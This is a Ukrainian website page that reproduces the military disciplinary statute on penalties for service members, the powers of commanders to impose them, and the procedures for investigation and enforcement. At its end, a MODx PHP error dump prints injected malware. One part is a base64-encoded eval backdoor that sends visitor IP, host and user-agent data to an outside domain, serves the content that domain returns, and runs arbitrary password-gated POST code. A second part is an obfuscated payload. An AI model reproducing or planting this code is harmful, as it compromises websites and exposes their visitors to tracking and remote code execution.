Стягнення за порушення військової дисципліни.

Український легіон » Дисципліни » Статут ЗСУ » Стягнення за порушення військової дисципліни.

1.  Дисциплінарні стягнення, які накладають на солдатів, матросів, сержантів і старшин. Права командирів (начальників) накладати дисциплінарні стягнення на підлеглих їм солдатів, матросів, сержантів і старшин.

У випадку порушення військовослужбовцями військової дисципліни або громадського порядку, командир (начальник) має нагадати йому обов'язки служби, а коли це необхідно – накласти дисциплінарне стягнення. При цьому треба врахувати характер вчиненого проступку, особу порушника та ступінь його вини.

З метою громадського осуду порушників військової дисципліни й громадського порядку, проступки військовослужбовців за рішенням командира (начальника) можна обговорювати: солдатів і матросів – на зборах особового складу; сержантів і старшин – на зборах сержантів і старшин відповідно; прапорщиків і мічманів – на зборах прапорщиків і мічманів; військовослужбовців-жінок – на зборах військовослужбовців-жінок із відповідним званнями (посадами), не нижчими за військове звання (посаду) військовослужбовців-жінок , проступок якої обговорюють; офіцерів – на зборах  офіцерів.

Рішення зборів є рекомендаційним для командирів (начальників).

Військовослужбовці за вчинені ними злочини несуть кримінальну відповідальність згідно з чинним законодавством.

У тих випадках, коли за вчинений військовий злочин відповідним законом передбачена можливість застосування заходів дисциплінарного стягнення, командир (начальник), враховуючи обставини й наслідки цього злочину, вирішує передати матеріали на винну особу прокуророві з нагляду за дотриманням законів у Збройних Силах України або обмежитися дисциплінарним стягненням. Вирішує це питання й визначає дисциплінарне стягнення той командир, від якого залежить передача матеріалів прокуророві з нагляду за дотриманням законів у Збройних Силах України.

Накладене на військовослужбовця дисциплінарне стягнення за вчинений злочин не звільняє його від кримінальної відповідальності.

У випадках, які не терплять зволікання, командири (начальники), що мають право призначати на посаду офіцерів, генералів й адміралів, можуть усунути порушника від посади.

Командир (начальник), який усунув підлеглого від посади, має негайно доповісти про це по команді, зазначивши причини та обставини, що спричинили усунення з посади.

Командир (начальник), який усунув підлеглого від посади без достатніх на те підстав, несе за це відповідальність.

 І. Дисциплінарні стягнення, які накладають на солдатів, матросів строкової служби :

а) зауваження;

б) догана;

в) сувора догана;

г) позбавлення чергового звільнення з розташування військової частини або з корабля на берег;

д) призначення поза чергою в наряд на роботу – до 5 нарядів;

е) позбавлення військового звання старший солдат (старший матрос).

ІІ. На солдатів і матросів, які проходять службу за контрактом, може бути накладено такі стягнення:

а) зауваження;

б) догана;

в) сувора догана;

г) призначення поза чергою в наряд на роботу – до 5 нарядів;

д) арешт з наглядом на гауптвахті до 10 діб;

е) позбавлення нагрудного знака “Відмінний фахівець Збройних  Сил  України”;

є) позбавлення військового звання старший солдат (старший матрос).

ж) звільнення з військової служби за службовою невідповідністю.

ІІІ. На сержантів і старшин строкової служби може бути накладено такі стягнення:

а) зауваження;

б) догана;

в) сувора догана;

г) позбавлення чергового звільнення із розташування військової частини чи з з корабля на берег;

е) позбавлення нагрудного знака “Відмінний фахівець”;

є) пониження на посаді;

ж) пониження у військовому званні на один ступінь;

з) пониження в військовому званні на один ступінь із переведення на нижчу посаду;

і) позбавлення сержантського (старшинського) звання.

ІV. На сержантів і старшин, які проходять службу за контрактом, може бути накладено такі стягнення:

а) зауваження;

б) догана;

в) сувора догана;

д) пониження на посаді;

е) позбавлення нагрудного знака “Відмінний фахівець Збройних  Сил  України”;

є) пониження у військовому званні на один ступінь;

ж) пониження в військовому званні на один ступінь із переведення на нижчу посаду;

з) позбавлення сержантського (старшинського) звання.

і) звільнення з військової служби за службовою невідповідністю.

V. На військовослужбовців-жінок може бути накладено такі стягнення:

а) зауваження;

б) догана;

в) сувора догана;

г) позбавлення нагрудного знака “Відмінний фахівець Збройних  Сил  України”;

д) пониження на посаді;

е) пониження сержантів і старшин у військовому званні на один ступінь, а солдатів і матросів – позбавлення військового звання старший солдат (старший матрос);

є) позбавлення сержантського (старшинського) звання;

ж) пониження сержантів і старшин у військовому званні на один ступінь із переведення на нижчу посаду;

з) позбавлення сержантського (старшинського) звання.

 

Права командирів (начальників) накладати дисциплінарні стягнення на підлеглих їм солдатів, матросів, сержантів і старшин.

VI. Командир відділення має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег;

в) призначати солдатів і матросів поза чергою в наряд на роботу – на 1 наряд.

VII. Заступник командира взоду має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег;

в) призначати солдатів і матросів поза чергою в наряд на роботу – до 2 нарядів.

VIII. Старшина роти (команди) має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег.

в) призначати солдатів і матросів поза чергою в наряд на роботу – до 3 нарядів

IX. Командир взводу (групи) має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег;

в) призначати солдатів і матросів поза чергою в наряд на роботу – до 4 нарядів.

X. Командир роти (корабля 4 рангу) має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег;

в) призначати солдатів і матросів поза чергою в наряд на роботу – до 5 нарядів;

XI. Командир батальйону (корабля 3 рангу) має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег;

в) призначати солдатів і матросів поза чергою в наряд на роботу – до 5 нарядів;

 

Командир окремого батальйону (корабля 2 рангу), а також командир (начальник) окремої військової частини, який користується дисциплінарною владою командира батальйону (корабля 3 рангу), крім того, має право накладати стягнення, зазначеня у пунктах “д” – “и” статті XII.

XII. Командир полку (корабля 1 рангу), бригади має право:

а) робити зауваження, оголошувати догану та сувору догану;

б) позбавляти солдатів і матросів чергового звільнення з розташування військової частини чи з корабля на берег;

в) призначати солдатів і матросів поза чергою в наряд на роботу – до 5 нарядів;

г) віддавати під арешт солдатів, матросів, сержантів і старшин – до 7 діб;

д) позбавляти нагрудного знака “Відмінний фахівець”;

е) позбавляти військового звання старший солдат (старший матрос);

є) понижувати на посаді сержантів і старшин;

ж) понижувати у військовому званні на один ступінь від старшого сержанта, головного старшини та нижче, в тому числі і з переведенням на нижчу посаду;

з) позбавляти сержантського (старшинського) звання;

і) звільняти з військової служби солдатів, матросів, сержантів і старшин, які служать за контрактом, за службовою невідповідністю.

XIII. Командир дивізії, крім прав, наданих командирові бригади, полку (корабля 1 рангу) має право:

а) віддавати під арешт солдатів, матросів, сержантів і старшин – до 10 діб, сержантів і старшин, які служать за контрактом – до 7 діб;

б) понижувати у військовому званні на один ступінь старшин, головних корабельних старшин, зокрема і з переведенням на нижчу посаду;

в) позбавляти військового звання старшин, головних корабельних старшин;

г) звільняти з військової служби старшин, головних корабельних старшин, які служать за контрактом, за службовою невідповідністю.

XIV. Командир корпусу, командуючий армією, військами округу, оперативного командування, видом Збройних Сил України щодо підлеглих їм солдатів, матросів, сержантів і старшин користуються правом накладати дисциплінарні стягнення в повному обсязі цього Статуту, за вийнятком дисциплінарних стягнень, передбачених пунктами “е” статті II, “д” статті IV, “г” статті V.

 

2.  Дисциплінарні стягнення, які накладають на офіцерів. Права командирів (начальників) накладати дисциплінарні стягнення на підлеглих їм офіцерів.

А. На офіцерів можке бути накладено такі стягнення:

а) зауваження;

б) догана;

в) сувора догана;

г) попередження про неповну службову відповідність;

д) пониження на посаді;

е) позбавлення нагрудного знака “Відмінний фахівець Збройних  Сил  України”;

є) пониження у військовому званні на один ступінь;

ж) позбавлення військового звання.

з) звільнення з військової служби за службовою невідповідністю.

 Б. Права командирів (начальників) накладати дисциплінарні стягнення на підлеглих їм офіцерів:

1)  Командир роти ( корабля 4 рангу) , батальйону (корабля 3 рангу) має право робити зауваження , оголошувати догану, сурову догану.

2)  Командипр окремого батальйону (корабля 2 рангу) й командир (начальник) окремої військовоі частини , крім того , мають право попереджувати офіцерів про неповну службову відповідальність.

3)  Командир полку  (корабля 1 рангу), бригада, дівізії маі право:

          а) робити зауваження, оголошувати догану, сувору догану;

          б) попереджувати про неповну службову відповідальністью.

4)  Командир корпусу, командуючий армією, крім прав, якими наділено командирів бригади, дивізії, має право понижувати у військовому званні на один ступінь молодших офіцерів.

5)         Командир військового округу, оперативного командування, видом Збройних Сил Украіни має право:

         а) робити зауваження, оголошувати догану, сувору догану;

         б) попереджувати про неповну службову відповідність;

         в) понижувати на посаді офіцерів від командирів батальйонів (кораблів 3 рангу) , відповідних ним і нижчих ;

         г) понижувати у військовому званні на один спупінь офіцерів до підполковника включно, крім того, командуючий видом Збройних Сил України має право звільняти осіб офіцерського складу з військової служби до підполковника включно за службовою невідповідністю.

6) Заступники Міністра оборони України, крім прав, якими наділено командуючого військами військового округу, оперативного командування видом Збройних Сил України, мають право понижувати на посаді офіцерів від заступників командирів полків, старших помічників командирів кораблів 1 рангу, відповідних ним і нижчих.

 

3.  Порядок накдладання і виконання дисциплінарних стягень.

На військовослужбовця, який порушує військову дисципліну, або громадський порядок може бути накланено лише ті дисциплінарні стягнення, які визначені цим Статутом і відповідають військовому званню військовослужбовця та дисциплінарній владі командира (начальника), що вирішив притягнути винну особу до дисциплінарной відповідальності.

Притягення до дисциплінарної  відповідальності військовослужбовців, які є народними депутатами, суддями військових судів, проводять у порядку, передбаченому законодавством України.

Офіцери прокуратур з нагляду до дотриманням законів у Збройних Силах України несуть відповідальність згідно з Дисциплінарного статуту прокуратури України.

Приняттю рішення командиром (начальником) про накладання на підлеглого дисциплінарного стягенння має передувати дисциплінарне розслідування. Його провадять із метою виявлення винних осіб, а також причин та умов, що сприяли вчиненню проступку.

          Дисциплінарне рослідування можуть не провадити  лише у випадках, коли необхідно припинити порушення військової дисципліни або громадського порядку й вина порушника очевидна.

          Дисциплінарне рослідування призначають усним наказом командира (начальника ), який вирішив притягти  військовослужбовця до дисциплінарной івдповідальності. Воно може бути проведено особисто командиром (начальником), доручено офіцерові чи прапорщикові (мічманові), а у випадку вчинення проступкеу солдатом (матросом) чи сержантом (старшиною) – також сержантові (старшині).

         Заборонено провадити дисциплінарне рослідування особами, які є підлеглими військовослужбовцями чий проступок підлягає розслідуванню, а також особами, які є  співучасниками правопорушення або зацікавлиними в наслідках розслідування. Рослідування провадять за участю безпосереднього начальника військовослужбовця, який вчинив дисциплінарний проступок.

   На початку дисциплінарного розслідування військовослужбовцеві пояснюють, у яких порушеннях його звинувачують, а сам військовослужбовець складає пояснювальну записку на ймья командира (начальника). Під час дисіиплінарного розслідування особа, призначена для його проведення, встановлює,  чи  справді мав місце проступок ,  де, коли, за яких обставин і з якою метою його було вчинено; в чому він виявився, наявність вини в діях (бездіяльності) конкретних осіб та ступінь провини кожного у випвдку вчинення його кількома особами, які наслідки порушення, обсавини, що пом’якшують чи обтяжують відповідальність винної особи; причини й умови, що сприяли вчененню проступку.

Завершують дисциплінарне рослідування доповіддю командирові (начальникові) про всі встановлені обставени вчинення проступку особамаи та пропозиції для приняття    рішення. Якщо розслідування призначав своім наказом командир військової частини, то йому подають письмову доповідь.

Дисциплінарне не може тривати більш як 5 діб, починаючи з дня, коли командирові (начальникові) стале відомо про вчинення проступку.

Якщо під час дисциплінарного розлідування буде з’ясовано, що проступок військовослужбовця містить ознаки злочину, то командир військової частини порушує кримінальну справу й повідомляє прокурора з нагдядудо дотримання законів у Збройних  Силах України, а дисциплінарне розслідування припиняє.

Після розгляду доповілі про здійснення розслідування командир (начальник) проводить бесіду з військовослцжбовцем, який вчинив проступок. Якщо вину військовослужбовця повністю доведено, командир (начальник) приймає рішення накладки дисциплінарних стягнень. Під час встановлення вини й виду дисциплінарного стягнення враховують: характер і обставини вчинення проступку, його наслідки, попередню поведвнку винної особи, а також тривалість військової служби та рівень знань про порядок служби.

Суворість дисциплінарного стягення збільшують коли винний вчинив проступки неодноразово або брав участь у груповому порушенні військовой дисципліни й громадського порядку, коли проступок вчинено бід час бойового чергування, виконання інших службових обов’язків, у стані сп’яніння або коли його наслідком було значне порушення порядку.

Дисциплінарне стягнення має бути накладено не пізніш як через 10 діб, починаючи  з дня, коли командирові (начальникові) стало відомо про вчинення проступку, ап якщо проводили рослідування, то з дня його закінчення. Під час дисциплінарного стягнення командир (начальник) не має право принижувати гідність підлеглого.

Вмсмловлені командиром (начальником) підлеглому попередження чи вказівка на недоліки служби не є дисциплінарним стягненням.

Військовослужбовець , який не важає себе винним, має право протягом десяти діб з часу накладення дисциплінарного стягення подати скару старшому командирові (начальникові).

Накладення дисциплінарного стягення на військовослужбовця, який входить до складу добового наряду (виконує бойове чергування), за проступки, вчиненні нисм під час несення служби, провадять після зміни наряду (з бойового чергування) чи після заміни його іншим військовослужбовцем.

Накладення дисциплінарного стягнення на військовослужбовця, який перебуває в стані сп’яніння та отримання від нього пояснень провадят після його витвереження. За потреби його може бути помішенно на гауптвахту чи до камери тимчасово затриманних терміном до доби.

Заборонено за один й той же проступок накладати кілька дисциплінарних стягненнь або поєднувати одне стягнення з іншим, накладати стягення на весь особовий склад підрозділу замість покарання безпосередньо винних осіб, а також піддавати дисциплінарному стягненню у вигляді арешту без визначеного терміну.

Якщо командир (начальник) за тяжкістю вчиненого підлеглим проступку визнає надану йому  дисциплінарну владу недостатню, він порушує клопотання про накладання стягення на винного владою старшого командира (начальник).

За перевищення наданої дисциплінарної влади командир (начальник) несе відповідальність згідно з чинним законодавством.

Старший командир (начальник) не має права скасувати або пом’якшити дисциплінарне стягнення, накладенне молодшим командиром (начальником), з причини суворості стягнення,  якщо останній не перевищив наданоі йому влади.

Старший командир (начальник) має право скасувати дисциплінарне стягнення накладене молодшим командиром (начальником), коли він визнає , що стягнення не відповідає тяжкості вчиненого проступку, й накласти ще суворіше стягнення.

За злочин прости встановленого порядку служби військовослужбовець несе відповідальність згідно з чинним законодавством України.

Старший командир (начальник) має не меньш як раз на 3 місяці контролювати стан дисциплінарної практики та вживати заходів щодо запобігання порушень військового порядку.

 

Порядок виконання дисциплінарних стягнень.

Дисциплінарне стягнення, як правило, виконують негайно, а у вийняткових випадках не пізніше як через місяць із дня його накладення. Після закінчення місячного терміну стягнення нездійснюють, але заносять до службової картки.

В такому випадку особа, з вини якої не було здійснено стягнення, несе відповідальність.

Виконання накладеного диссциплінарного стягнення у випадкуподання скарги військовослужбовцем не зупиняється, поки не надійде розпорядження старшого начальника про його скасування.

Про накладені дисциплінарні стягнення оголошують солдатам і матросам особисто чи перед строєм; сержантам і старшинам – особистот чи перед строєм сержантів і старшин; прапорщикам і мічманам – особисто, на нараді прапорщиків чи мічманів, я також на нараді прапорщиків, мічманів та офіцерів; офіцерам, генералам й адміралам – особисто, в розпорядженнічи на нараді (старшим офіцерам – в присутності старших офіцерів, генералам й адміралам – у присутності генералів  й адміралів).

Крім того, дисциплінарні стягнення можуть оголошувати в наказі.

Оголошувати дисциплінарні стягнення командирам (начальникам) у присутності їх підлеглих заборонено.

Під час оголошення дисциплінарного стягненя до відома військовослужбовця доводять причину накладення стягнення та в чому полягає порушення військової дисципліни чи громадського порядку.

Зауваження чи догану оголошують військовослужбовцеві в порядку, визначеному Статутом.

Позбавлення чергового звільнення з розташування військової частини чи з корабля на берег означає заборону протягом 7 діб відлучатися без службової необхідності з розташування військової частини (сходити з корабля на берег) зокрема, брати участь у колективних (у складі підрозділу) відвідуваннях культурно-освітніх закладів та місць відпочинку.

Солдатів, матросів й курсантів перших курсів військово-навчальних закладів, призначених поза чергою в наряд на роботу, залучають до виконання робіт у своєму підрозділі або військовій частині в будь-які дні тижня у вільний від занять час. Тривалість одного наряду на роботу не має перевищувати 5 годин на добу. Роботи виконують від підйому до відбою.

Про позбавлення нагрудного знака “Відмінний фацівець” оголошують письмовим наказом командира (начальника), який має відповідну дисциплінарну владу, а про позбавлення знака “Відмінний фацівець Збройних Сил України” – наказом Міністра оборони України. Наказ про це оголошують щодо: солдатів і матросів – перед строєм військової частини; сержантів і старшин – перед строєм сержантів і старшин; прапорщиків і мічманів – перед строєм прапорщиків і мічманів; осіб офіцерського складу-  під час нарад (зборів).

Пониження у військовому званні проводять посадові особи, якм надано право присвоювати військові звання. Пониження у військовому званні, пониження н посаді здійснюють за наказом командира (начальника).

Заборонео зривати погони, зрізувати нашивки та чинити інші дії, які принижують гідність військовослужбовця.

Попередження про неповну службову відповідність застосовують одноразово протягом перебування прапорщика (мічмана), офіцера, генерала (адмірала) на штатній посаді, яку він займає.

Якщо протягом року після накладення цього стягнення прапорщик (мічман), офіцер, генерал (адмірал) не виправив своєї поведінки зразковим виконанням військового обов‘язку й стягнення не відіграло своєї ролі, на нього подають документи на пониження на посаді у встановленому порядку або вирішують питання про дострокове розірвання контракту.

Арешт із наглядом на гауптвахті є одним із крайніх заходів впливу і його застосовують і випадках, коли інші заходи, вжиті командиром (начальником), виявилися безуспішними. Кількість днів перебування заарештованого на гауптвахті вираховують із щорічної відпустки, але не більш як на половину встановленого терміну відпустки. Здійснюють арешт у порядку, встановленому в додатку 4 цього Статуту.

Позбавлення військового звання застосовують щодо військовослужбовців які вчинили  проступки, що дискредитують честь і гідність військовослужбовця. Позбавлення військового звання є крайнім засобом стягнення, його застосовують у випадку, коли перед тим вжиті засоби впливу виявилися безуспішними.

Позбавлення військовослужбовця військового звання може бути проведено за рішенням зборів відповідного складу військовослужбовців. Поновлення в попередньму військовому званні провадять згідно з  тимчасовими положеннями про проходження військової служби військовослужбовцями.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0106 s(22 Requests)
  PHP: 0,2316 s 
  Total: 0,2422 s